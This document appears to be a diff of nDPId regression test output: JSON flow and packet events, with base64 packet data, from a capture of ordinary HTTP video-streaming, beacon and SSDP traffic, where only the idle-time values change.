+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7560000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1467353157433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":389,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":389,"pkt_l4_len":355,"thread_ts_msec":1467353157433,"pkt":"TF4M6gNlABxCjnAxCABFAAF3D2lAAIAGOZbAqHMIb84NA8U8AFD\/xaF06zAEllAYAQRGTAAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P3F5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiBIVFRQLzEuMQ0KSG9zdDogcGRhdGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBIQ0ROQ2xpZW50X1dJTlBDO2xpYmN1cmwvNy4yNi4wIE9wZW5TU0wvMS4wLjFnIHpsaWIvMS4yLjU7UUsvMTAuMC4wLjI5Mw0KDQo="} 
+00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7560000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1467353157468,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353157468,"pkt":"TF4M6gNlABxCjnAxCABFAAOkD3JAAIAG2tjAqHMIymwO7MU9AFA84A6MMfAazlAYQTez3QAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNTcwNDYmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 
+01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353157046&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1467353157475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157475,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDRAADMGDUtvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7560000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00992{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1467353157509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":457,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":457,"pkt_l4_len":423,"thread_ts_msec":1467353157509,"pkt":"TF4M6gNlABxCjnAxCABFAAG7D3xAAIAGbLPAqHMI3xpqQsU+AFB482xgj\/e7VVAYAQRcuQAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmEzMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQpSYW5nZTogYnl0ZXM9MzQyNDI1Ni04MDU3MDIzDQoNCg=="} +01136{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7560000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012&uuid=76a3085a-57760844-8b","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1467353157533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353157533,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5zsFAADMGa3TKbA7swKhzCABQxT0x8BrOPOASCFAYACB8+QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1467353157718,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157718,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDVAADMGDUpvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1086,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1467353158696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353158696,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLHIAAAER1v7AqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1467353159222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1467353159222,"pkt":"TF4M6gNlKDc3Alz6CABFAAE1+vRAAEAGNqjAqAUPROn9hf5nAFAhJnFt6cGPtIAYEBWfeAAAAQEICiYbloUrIzeaR0VUIC9jb21NYWdpY2FuQXBpL2luZGV4LnBocC9Ub29sQm94L3ZlcnNpb24gSFRUUC8xLjENCkhvc3Q6IGFwaS5tYWdpY2Fuc29mdC5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLXR3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1hZ2ljYW4gKHVua25vd24gdmVyc2lvbikgQ0ZOZXR3b3JrLzcyMC41LjcgRGFyd2luLzE0LjUuMCAoeDg2XzY0KQ0KDQo="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/index.php\/ToolBox\/version","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} -00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1467353159428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353159428,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4t91AADUGhHxE6f2FwKgFDwBQ\/mfpwY+0ISZyboAYABs\/NQAAAQEICisjOHomG5aFSFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6MjUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} 
-00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1467353159731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353159731,"pkt":"TF4M6gNlABxCjnAxCABFAAGgFhZAAIAGZjTAqHMI3xpqQsU+AFB4823zkD5tZ1AYAQS6ZwAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2Y3JjP2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmEzMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQoNCg=="} -00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1467353159746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":443,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":443,"pkt_l4_len":409,"thread_ts_msec":1467353159746,"pkt":"ABxCjnAxTF4M6gNlCABFAAGtzXdAADgG9sXfGmpCwKhzCABQxT6QPm1nePNva1AYACEkXQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU5IEdNVA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkNvbnRlbnQtTGVuZ3RoOiA3Mg0KTGFzdC1Nb2RpZmllZDogU2F0LCAyNSBKdW4gMjAxNiAyMDo0Nzo0OCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkVUYWc6ICI1NzZlZWRmNC00OCINCkV4cGlyZXM6IFNhdCwgMDEgSnVsIDIwMTcgMDY6MDU6NTkgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQoBAAAAjem7lGlyqIWJ0WZ4YikhMAAAAADA8HoAAAAAAJ0fBgCdHwYAAAAgAABAAACfagIAEAAAABkBmvdUqrt6QK4cKbQBDrk="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1467353159222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1467353159222,"pkt":"TF4M6gNlKDc3Alz6CABFAAE1+vRAAEAGNqjAqAUPROn9hf5nAFAhJnFt6cGPtIAYEBWfeAAAAQEICiYbloUrIzeaR0VUIC9jb21NYWdpY2FuQXBpL2luZGV4LnBocC9Ub29sQm94L3ZlcnNpb24gSFRUUC8xLjENCkhvc3Q6IGFwaS5tYWdpY2Fuc29mdC5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLXR3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1hZ2ljYW4gKHVua25vd24gdmVyc2lvbikgQ0ZOZXR3b3JrLzcyMC41LjcgRGFyd2luLzE0LjUuMCAoeDg2XzY0KQ0KDQo="} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/index.php\/ToolBox\/version","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} +00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1467353159428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353159428,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4t91AADUGhHxE6f2FwKgFDwBQ\/mfpwY+0ISZyboAYABs\/NQAAAQEICisjOHomG5aFSFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6MjUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} 
+00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1467353159731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353159731,"pkt":"TF4M6gNlABxCjnAxCABFAAGgFhZAAIAGZjTAqHMI3xpqQsU+AFB4823zkD5tZ1AYAQS6ZwAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2Y3JjP2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSZxeWlkPWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnF5cGlkPTIwMTImdXVpZD03NmE